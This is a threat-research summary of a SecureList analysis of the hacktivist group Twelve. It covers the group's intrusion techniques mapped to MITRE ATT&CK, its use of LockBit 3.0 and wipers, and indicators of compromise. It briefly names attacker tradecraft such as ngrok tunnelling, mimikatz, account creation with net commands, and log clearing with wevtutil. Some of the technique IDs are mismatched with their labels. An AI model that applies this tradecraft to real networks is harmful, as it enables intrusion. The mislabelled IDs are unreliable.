Threat Research

-=TWELVE=- Returns!

SecureList

Two sentences: Twelve is a hacktivist-aligned group formed in April 2023 amid the Russian-Ukrainian conflict that encrypts and deletes data, exfiltrates sensitive information, and posts it to Telegram, often sharing techniques with the DARKSTAR ransomware group. The analysis uses the Unified Kill Chain to detail their reconnaissance, exploitation, persistence, and impact, including ransomware, wipers, and data leakage. #TwelveGroup #DARKSTAR #LockBit3 #Shamoon #CobaltStrike #Mimikatz #Ngrok #Telegram

Keypoints

  • The Twelve group formed in April 2023 and has targeted Russian government organizations.
  • They encrypt and delete data, exfiltrate sensitive information, and publish it on Telegram to maximize impact.
  • Twelve shares infrastructure and techniques with the DARKSTAR ransomware group, suggesting a close linkage.
  • Publicly available tools (e.g., Cobalt Strike, mimikatz, PowerShell) are heavily used in their operations.
  • Initial access commonly comes from valid local/domain accounts and VPN/SSH certificates, with RDP for lateral movement.
  • Persistence is maintained via web shells and backdoors; defense evasion includes log clearing and disguising malware.
  • Ransomware (LockBit 3.0) and wipers are used to destroy victim infrastructure; operations are hacktivist rather than financial-driven.

MITRE Techniques

  • [T1021.001] Remote Desktop Protocol – Lateral movement using RDP after gaining access to victim infrastructure. “…The attackers used the Remote Desktop Protocol (RDP) to move laterally.”
  • [T1133] External Remote Services – Initial access via VPN and VPN-derived access to target networks. “initial access … VPN or SSH certificates.”
  • [T1078] Valid Accounts – Gained initial access through valid local or domain accounts. “gained initial access to victims’ infrastructure through valid local or domain accounts…”
  • [T1090] Proxy – Pivoting traffic through ngrok to reach systems via RDP. “The adversary used ngrok to tunnel traffic… all illegitimate connections to the system via RDP were made through ngrok.”
  • [T1105] Ingress Tool Transfer – Delivery of tools to compromised hosts using curl and wget. “The curl and wget system utilities to deliver various tools to compromised hosts.”
  • [T1016] System Network Configuration Discovery – Discovery of networked assets via tools like Advanced IP Scanner and BloodHound to map the environment.
    “Advanced IP Scanner can quickly identify all devices on a given network… BloodHound is used to analyze and visualize users and systems the domain trusts”
  • [T1033] Account Discovery – Discovery of domain user accounts using the PowerView module.
    “discover domain user accounts”
  • [T1550] Pre-OS Credential Dumping – Mimikatz usage to obtain credentials from memory (LSASS).
    “Used mimikatz to obtain user credentials.”
  • [T1059] Command and Scripting Interpreter – Extensive use of PowerShell and self-written scripts.
    “The attackers used system interpreters and publicly available tools… self-written .bat and PowerShell scripts”
  • [T1053] Scheduled Task/Job – Creation of scheduled tasks to run ransomware and wipers.
    “Created scheduled tasks to execute ransomware and wipers.”
  • [T1021.004] PowerShell Remoting – Interactive remote sessions via Enter-PSSession on remote machines.
    “Enter-PSSession -ComputerName [COMPUTER 1]”
  • [T1068] Privilege Escalation – Use of legitimate credentials and PowerView to modify ACLs and escalate privileges.
    “Modified ACLs and added domain users to escalate privileges.”
  • [T1136] Create Account – Adding domain accounts and groups to widen access.
    “net user … /domain”; “net group … /domain”
  • [T1036] Masquerading – Disguising malware and tasks under names of legitimate products/services.
    “disguised their malware and tasks under the names of existing products or services.”
  • [T1070] Indicator Removal on Host – Clearing event logs to hide activity.
    “cleared the event logs with the wevtutil.exe system utility”
  • [T1562] Impair Defenses – Hiding traces and masking activity; renaming tasks and logs.
    “hide the traces of their activity”
  • [T1486] Data Encrypted for Impact – Ransomware encrypting data and demanding ransom.
    “encrypt data and demand ransom”
  • [T1041] Data Exfiltration – Exfiltrated sensitive data to external file-sharing services.
    “Exfiltrated sensitive data to external file-sharing services.”
  • [T1204] Web Shell – Deployment of PHP web shells for remote access.
    “installed PHP web shells on compromised servers for remote access.”

Indicators of Compromise

  • [IP Address] context – 212.109.217.88, 195.2.79.195, and other listed IPs used for command and control and infrastructure.
  • [Domain] context – dropmefiles.net used for exfiltration via cloud sharing services.
  • [File] context – twelve.exe, enc.exe, and other ransomware/wiper filenames seen in incidents.
  • [Hash] context – 05d80c987737e509ba8e6c086df95f7d, 48b2e5c49f121d257b35ba599a6cd350 (web-shell/file-hash examples) and additional hashes listed in the article.

Read more: https://securelist.com/twelve-group-unified-kill-chain/113877/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint